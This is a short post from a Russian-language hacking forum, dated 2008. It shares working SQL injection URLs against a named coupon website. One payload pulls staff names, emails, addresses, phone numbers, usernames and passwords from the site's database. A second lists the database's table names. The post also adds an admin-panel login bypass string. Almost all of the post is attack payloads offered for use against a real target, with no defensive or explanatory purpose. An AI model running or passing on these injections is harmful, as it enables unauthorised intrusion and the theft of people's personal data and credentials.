Показать сообщение отдельно

  #3  
Старый 13.03.2008, 02:45
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

Код:
http://www.chameleondeal.com/coupons/category.asp?ID=1%20or%201=(SELECT+TOP+1+cast(id+as+nvarchar)%2B%27%3A%27%2Bcast(FName+as+nvarchar)%2B%27%3A%27%2Bcast(MName+as+nvarchar)%2B%27%3A%27%2Bcast(LName+as+nvarchar)%2B%27%3A%27%2Bcast(Email+as+nvarchar)%2B%27%3A%27%2Bcast(StreetAddress+as+nvarchar)%2B%27%3A%27%2Bcast(City+as+nvarchar)%2B%27%3A%27%2Bcast(State+as+nvarchar)%2B%27%3A%27%2Bcast(Zip+as+nvarchar)%2B%27%3A%27%2Bcast(HomePhone+as+nvarchar)%2B%27%3A%27%2Bcast(WorkPhone+as+nvarchar)%2B%27%3A%27%2Bcast(Cell+as+nvarchar)%2B%27%3A%27%2Bcast(Pager+as+nvarchar)%2B%27%3A%27%2Bcast(Fax+as+nvarchar)%2B%27%3A%27%2Bcast(UserName+as+nvarchar)%2B%27%3A%27%2Bcast(Password+as+nvarchar)%2B%27%3A%27%2Bcast(DateEntered+as+nvarchar)%2B%27%3A%27%2Bcast(DateModified+as+nvarchar)+from+Staff)--
Код:
http://www.chameleondeal.com/coupons/category.asp?ID=1%20or%201=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('Coupons','Categories','deal','Deals','dtproperties','News','Oshkosh_west','Retailers','Staff','sysconstraints','syssegments','t_jiaozhu'))--
+ в админке ' or 1=1--
 
Ответить с цитированием